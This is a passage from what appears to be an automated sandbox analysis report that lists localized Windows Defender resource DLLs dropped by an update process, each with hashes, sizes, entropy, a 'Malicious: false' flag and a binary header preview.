SSDEEP:	768:sQLIoHwex9cxMtOkAK+FRFKIlaR1Png9zuKqo:kex2WtOhK+TPlaHPozu2
MD5:	CFA149AC96D8AD65A28FB3AAE5E357F8
SHA1:	C91EE6D4428773C2EFE428FDE6A2CC02FEF94317
SHA-256:	F09DF87374A096976E302BB48018055AEAF115ED33E574875B16C9AC589D6882
SHA-512:	454FEB178E2BE1E3048BE1984E39CD681AF3C7684C14AAADDC7135421C827082FA19DA31B5C5A94843DA21A46D547E726FCBD71B591FDF105F43F322ECB1BF95
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................P....@.......................................... .. ................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\pt-BR\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	57608
Entropy (8bit):	4.529528463228323
Encrypted:	false
SSDEEP:	384:bmnhSmktkGrXihFdOUry+KoK2o4XqPA/UTjGgQpxliKgKYuuXpLxo89W6YDBRJkA:bGk5tfUMfpL9fY1Pj50Zi9zuiV
MD5:	509A14223DE59E6E4E6373A01C8F456C
SHA1:	108B22F1E15BA1140F0911F48CE56FBCB86BFA27
SHA-256:	E6324C6F89E41FDCAB4740F6A42AE6B33BF342F8056D85AB90C7F5F60A177751
SHA-512:	0B13CE651992D1542EA8B65B1CD1C2463CE3B92BC4848A5324B9424D959E7E09CF28248F5B3E03AA14E0F2A0E29218351CB3D076828ED19999B70532C22906A1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\pt-BR\ProtectionManagement.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	56584
Entropy (8bit):	5.682648200196768
Encrypted:	false
SSDEEP:	768:Lda0fHgPnDIwj6bPSPMUqAw/4DTUqvJRXxAoBtSqc1wg1PSwvQP9zum:pa0fHyt6/UqkrHXoqswYPozum
MD5:	626CC98EB99E4C8A273CEB6C6A591ACF
SHA1:	E4064D1110F751FBEF55FF9C93721E45783603E8
SHA-256:	23EC35EC414F43209A01508A70023030F65025B6EFFD1DF8A22E57C8BAE5E66F
SHA-512:	112D8F6799150F065633B5F4917935CF35E6A97E01DCB72D4E39714A80134AA5CA0FB86B27DCF31C61E498326A93A5F047594066462FBAD9274273DAD1924486
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................._....@.......................................... ..................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@....h...........l...P...P.......h...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%.......rsrc$02.... ...Ml.G...s.R.......%#~&..e.;.h...........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\pt-BR\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	5.062166760898988
Encrypted:	false
SSDEEP:	384:YCbkUhHQBKYNYA5HnoWSa/WhDBRJqQwBmfWojR9zusw7gal:z9DA9w1PdfWoF9zuN
MD5:	5E180326FB2A8DAE199E778C9EF5CDC5
SHA1:	61424BE30213BCF073FFA2646ED2B972A3B460F5
SHA-256:	388B4413DFC8554EA26819B1DB59B25EF4432C735ACA7038CF3607C9242D1FDA
SHA-512:	40B4EE1EDFF9B2AE288BBD52B7D1DE6F60AC287CDE6DFC43C7CDADCD4E1C9DBFC700259D0638808F00D009A62700108667E4E326DE010BECEBFFDF3C017AA55D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........Z......................................................F.....@.......................................... ...V...........\...%...........................................................................................rdata..............................@..@.rsrc....V... ...X..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...Q...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\pt-PT\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	67848
Entropy (8bit):	4.279234822028203
Encrypted:	false
SSDEEP:	1536:jevEPjfPbi+9emR0wdrsxC77X1Mea5qql/PlSzuF:jevEPjfPbi+9emRLRaCXXs/U0
MD5:	4D86D5B9A5A30302C9894AF93FA69E12
SHA1:	2458F99ED5AF547DE139DCB93AC4A2DFD6EF994C
SHA-256:	8DF0F298024FDAF3627E6D35EB90139907C4C9FB58F7DCC4E43A564FF3B438DF
SHA-512:	3D8E859F061C322A11A9906874CDB46F3E310548F5A6DCBBE40BBB6B61C572D01A318ED5B212378065DA44487064DE94D348415804EDF7232B45EA6085C7CB64
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\pt-PT\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58120
Entropy (8bit):	4.525028671339672
Encrypted:	false
SSDEEP:	384:S1YOkXGHgbVbFtqg6gGNjcIEyEBjTUJXBJ4DDqD9wZ/wiluBf4iq4Enr67mtNZrr:SKhHYfNqruiNZrPsY1PmRmuU9zuIb
MD5:	0648F15A15E3C9E2C0A26CE32B0C090F
SHA1:	8104C9CA27E95DF8B73AFFDABF49468A97790874
SHA-256:	053F027050F469883DF6CD3D8D5E024A35448F85AB8CA7D84373A32F33724163
SHA-512:	F894C4754341A2AE068F218D4D2B602C6885C90CE5F549D50DF3A15FC82CD2FCD7B6D5D72C6B6F2C897EC85AD874F88B92415432FE000BB6DDCF9116390C0F36
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................l....@.......................................... ..8................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\pt-PT\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32016
Entropy (8bit):	5.0602756781368825
Encrypted:	false
SSDEEP:	384:rV8FQSY4YOFrK7pnznIwWSa/W3DBRJQoTN4tgR9zvn2:5MQSWz8C1PQoTNx9z+
MD5:	5B34AD60D7598BE271DE002A087189B0
SHA1:	ABC39E3664864E2E11712C12E89F723920FAA5BD
SHA-256:	D182665F45A4B15CCB7D895A7CCD0F4E860FEBA72BBB980B832E71F5A767ED2D
SHA-512:	02CF360247CEF9ED02C2B871385BBECA589B717FE89170CB64A3C603F5B5B590FFF8507F83160021176288E9C6E87019F7F18BF9B7E80AA33A9BDFB1D0EC0D10
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........V............................................................@.......................................... ...S...........X...%...........................................................................................rdata..............................@..@.rsrc....S... ...T..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...N...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\quz-PE\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32008
Entropy (8bit):	5.086333438370554
Encrypted:	false
SSDEEP:	384:63bNXrWbVOk6njxWSa/WRDBRJYe99R9zus1QpJ:kbNXKOk6nYc1PJ9/9zurJ
MD5:	F2D9596A542736F5CB8696E54DC078AA
SHA1:	50328B5CC06504A38ACB9B6FD91374B627CDF1B9
SHA-256:	3D567D4BE55884392AD8FC42440B70547A257966F92B78715F4DBF549CBA97A4
SHA-512:	72130FE5554090D2DA2B93A33659172D78E2319CE4521EB0D1EBCF946967E561DBD920CAA30EC377CFFB735B6D11E066C30CBF0E88A39ED73024BAEAEEE684BC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........V......................................................V.....@.......................................... ...R...........X...%...........................................................................................rdata..............................@..@.rsrc....R... ...T..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..0M...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ro-RO\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	67848
Entropy (8bit):	4.379576102213684
Encrypted:	false
SSDEEP:	768:YnOg+iyrUXums3M7t75si5kD+bROCZruaXEitXP7t+KGt8jihhuV+HBivLFsc6P9:iC+s5fdhhuVTGiiiDH11J9PMf9Xzum
MD5:	D5D7179DE8AC0A88364EEEAA44AC08DA
SHA1:	BA80073376C5B48005F96302F39359920241AFFA
SHA-256:	170E9BEA889DD1221D885BEFEF724F8FD921585B68F92D4513466DF9BE279FFF
SHA-512:	0F9158B5F35CA13EDAB813A297433B2D4470C4A024080A88FC250B7D5198724AC02BF51E25E041611AD0CBDB0EF3C5C10E6235148BDD51C336DDDDAD0C94A22F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................j....@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ro-RO\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32520
Entropy (8bit):	5.131986889605422
Encrypted:	false
SSDEEP:	384:2R+COmy+OcWNqXHGoKmVEVHWKQ3mUWvWSa/WsDBRJkMpQtR9zusB7ed:RKO3qXHGoKmVT3XRV1PkKQP9zu4a
MD5:	2D697F73D18E734F5F6F095930DD6A6E
SHA1:	5F8BFDD0A32C449788F321F6A3011301A945D309
SHA-256:	EE035F82B85E6A5E97DB98D990B996BE5234CE79BFBC43A82F2125D418C52A94
SHA-512:	51E03A148F6E775D084F66432A382CC3F7421C8F0D0F0DAFF37A9591750533EAB58C55F1F211F1A8DD3E35EB78C27A755A03DCFE687B81E72B2CE7AD23FD482B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........X............................................................@.......................................... ...T...........Z...%...........................................................................................rdata..............................@..@.rsrc....T... ...V..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...P...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ru-RU\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68360
Entropy (8bit):	4.763505085710729
Encrypted:	false
SSDEEP:	384:Q3gwyMBRJYGHUp8wtVM8xrYXoHEfbl0af61jksG9yvJGNV8GLWz3DBRJ/k5+R9zZ:2ybrAM31Pcg9zuclV
MD5:	0EB008E624B017720656751272144BD7
SHA1:	B4B7757D66C5ABBD3FC881EE81F3E2108791B116
SHA-256:	A1396B05CF0CF27EA4B9FB1085EE1A24F419A581E01314CDF58B972FCAB4366C
SHA-512:	E8028173B6B4647B28C973C47B0B2AA45DF363DC7A7E9BCEC573DAFDC5889060F0DF3CAC479E22BD96E75C144902B444308A33B113EC0FAED0F873378B33E0A7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ru-RU\MpEvMsg.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58640
Entropy (8bit):	4.9808890254051486
Encrypted:	false
SSDEEP:	384:nDqwbvhMhwBmKVdpZrK/rkfzzWrbDBRJWQXzC/R9zUIRvTv6:nDxDIK7rK/rCcb1PrXzg9zbR7v6
MD5:	79DEB02128B5F0703CA83F5CCAA0EED0
SHA1:	7EE558949C06DCD64D418F72C129B40B5F99DAB6
SHA-256:	FC9654753922B461B594D089786A905E0035358B75962C690C13E2437589E694
SHA-512:	E038E3712585460E1FA975F267AB0E778AA13A6213FA51C8E1C305C90ED3179CD6AE04CE944A01F0341625DEE694AA44C8ACC6C001BCAD57EC0FE334A9DCC29F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................)....@.......................................... ..................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.......q........l...P...P..........q........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ....;.F...`..w.8.-.S..1.d.q.....q........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ru-RU\ProtectionManagement.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	56592
Entropy (8bit):	5.779336197414034
Encrypted:	false
SSDEEP:	768:bZYVWgSwk3wMTcgoYXka39JeeM+FsaHahzdgnSn1PLa289zRv:efSwk3wkoYXFT+wsa4gS1PGFzt
MD5:	E755D8448209A23BBA3A15EB389A0446
SHA1:	6677C20E17807BCA9375E742B633F9A97949DEBC
SHA-256:	C29B1098B67E7A35B5D60C7C282BA832A9DB009649AED6C91AE5672B8E785887
SHA-512:	ADBF30281D968DF5A9011038EF9DB554933CA659B02D6B94F25EF5EDCB540195CE925FA2E6473835110409B882885D7AD52868C7208B9113DEA331218EE0AA5D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... ...................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@....h...........l...P...P.......h...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%.......rsrc$02.... ...Ml.G...s.R.......%#~&..e.;.h...........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ru-RU\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32008
Entropy (8bit):	5.536531810792382
Encrypted:	false
SSDEEP:	384:ubKnXns0Wr9c4ZLFQxwFWWSa/WgDBRJrCcM6a1R9zusWJM:a1R11P2n6K9zuC
MD5:	E698205B676D21CF19C7CA90B5F90944
SHA1:	6E95BBA269A765B26C56288A6941BA72AF75B2B0
SHA-256:	07332078E4C56462450307D45B1BFDA984E4FB77D5F749D3CE32E50271E80043
SHA-512:	BCD3056FCEE9E5A4A1469C28BF1198D7A36E5D468CB0CB0A57954C25EFBA9DDF2B16C3D5E12E91B3589AF9829A9E50F6E5C7890AB4052AA74912ECECDD5F15D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........V......................................................~r....@.......................................... ...R...........X...%...........................................................................................rdata..............................@..@.rsrc....R... ...T..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...M...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\sk-SK\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66312
Entropy (8bit):	4.474679217830135
Encrypted:	false
SSDEEP:	1536:/vDa4ow8Jw95U/DZjJEneyUCi4gWgQEpfhhQHPbdk/zuzz:HDJow8Jw950DZjJ3QEpcHRk/6z
MD5:	1B4250ABABA3AE34BBE73C5BEA24CF9D
SHA1:	D112E177BAEFC6EBD358F60ED853C74CA194D562
SHA-256:	467CC1F19459680D59E92DDB30FAFDE051F85D24DD7B9D49B7966E6254191CBA
SHA-512:	23D51ADEB773A3AAD3300187DEEC555BE4868459423D556F0524AE43E9F26FEA72A133CE5C1227BD427A3E6E853D1F9AFD4EC9672B1196870DE8C9C1B45E7FA5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................t.....@.......................................... ..X................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\sk-SK\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30984
Entropy (8bit):	5.248409400098195
Encrypted:	false
SSDEEP:	768:YDU2JnIM9kjq1IHitAwfH4ty9hKHjDKr3q71PBMufiC9zuu70:bm59kjq1IHitAwfH4ty9hKHjDKbqRPBM
MD5:	3B52E922BDC76AFA9D6D3DEBCC1281C4
SHA1:	66DCAB7E41CAAA9CE81FAC0E6DC8A705B8469B01
SHA-256:	CBA64350C6C0370BE965729A48205902932C7BC29B9CB0111A428E1BBE54563B
SHA-512:	DF90C202C628A983D18778A94532E4977FEBC4205E06DB76048A644A86E53CCCC973606C2FABD9C9402DEC289CC46329EF304CAC359D9883BC04B09B434BDEB6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........R...............................................p...........@.......................................... ...N...........T...%...........................................................................................rdata..............................@..@.rsrc....N... ...P..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...I...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\sl-SI\MpAsDesc.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	67336
Entropy (8bit):	4.329397552905738
Encrypted:	false
SSDEEP:	1536:P+Vv0SEEyDEoCxou61Mkwb+mzxsrts0mXBZtklS9T1VGVPPzub:P4vKEywoCxoKbDxsrts0mXBZtklMT1Vp
MD5:	E4D374A706416116985A6E2A4940EE43
SHA1:	CEF41EF2383C00F0FBF23D73970BD3281CDC41B7
SHA-256:	B0F5A884C090AE56FC9963E355AE3CB0626C366A6CEF17420804B93FDB0457DF
SHA-512:	D2F1F0AE2ECC3F22D0E9DE6EDF24D5987EC03D268647A700ED3AAEE36BF120BF0B34370B59EA3ECEF98BC4DADA49DE2861E7FC3F20C6D4C014AFC2F500A78C54
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................._....@.......................................... .. ................%..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....~D.........l...P...P........~D.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..(....rsrc$02.... ...02.l...C[...2.#..&.;.CT..PK.~D.........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\sl-SI\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31496
Entropy (8bit):	5.176514880581191
Encrypted:	false
SSDEEP:	384:ICKR7jIFTQqveMFwjLxstqv9NUaDZid7gWSa/WdGDBRJrM8M8/fi/GR9zusl4qz:oi7YG1PpMufiC9zuuz
MD5:	482406B8E930AB08D90150C01AA4D131
SHA1:	21F58995F1659AD413B9FD155B6E8CCF533ED7DA
SHA-256:	0434BFA8487172737A0DF04F2E63CF079BC7F5B51BD46318C4272CEFA90418BB
SHA-512:	27C9A3567D7FD4A7751AA78792EF55E5653F9E1E6383BD08BDC1C4C5C9FECEA38D093344CE081A5038AC94BE2977880FDF0C30A7C7A45ED66FAAE5A0BCF4FAC8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........T.......................................................!....@.......................................... ..`P...........V...%...........................................................................................rdata..............................@..@.rsrc...`P... ...R..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%..pK...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\sq-AL\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31496
Entropy (8bit):	5.129122254794213
Encrypted:	false
SSDEEP:	768:p+kOWAVCKUmusK9hfMfJNZ8qAsKSkj1P3adk9zuKI:AIpPlzuKI
MD5:	36D058F972BB124F2ED5C59C74BF0EEA
SHA1:	EE4ED38C8F910D97C76F26F1C448B1FFB189B1EF
SHA-256:	2E83CC1130A207858DED6A5B8CE2FF164F9F4EFAC8B7FF1406A06AC4D5187543
SHA-512:	0D06F72889CFDAC7817C79D920F3F10A1E532B7A1DAE98E45AAC8C599F80130421BA1DBC72E568F075266150C17A169F3C830067F957894CD272E984482D14D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........T.......................................................@....@.......................................... ...P...........V...%...........................................................................................rdata..............................@..@.rsrc....P... ...R..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...L...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\sr-Cyrl-BA\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31496
Entropy (8bit):	5.505898584996521
Encrypted:	false
SSDEEP:	384:3E3+VIQqOq49SbJo5Jdr8KCq4WSa/WDDBRJdsPk5+R9zusyBTx:03E9Slo3pZi1PKsg9zuZx
MD5:	5004FA39B2E57C824DF6D2BDE23A9425
SHA1:	EE7F468156DBDFADB2E7D05B71EC5A95D4DD31E3
SHA-256:	7ACBD12E2FCD70C547421F4C0C547BDEB92FA344F09959E2E1D2384D73025868
SHA-512:	7AA6A117A1DAB120EF9468B970912FE090012D3CA234582C61E2D6333B5761EE841A5052FB85016382BF15B177CA7D1B63F9CA5438AC46DC7B3C65100E91ACEF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L....Fb...........!.........T............................................................@.......................................... ...P...........V...%...........................................................................................rdata..............................@..@.rsrc....P... ...R..................@..@.....Fb........l...4...4........................................rdata...........rdata$voltmd...4...l....rdata$zzzdbg.... .......rsrc$01.....%...L...rsrc$02............................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\sr-Cyrl-RS\mpuxagent.dll.mui

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32008
Entropy (8bit):	5.501878872070941
Encrypted:	false
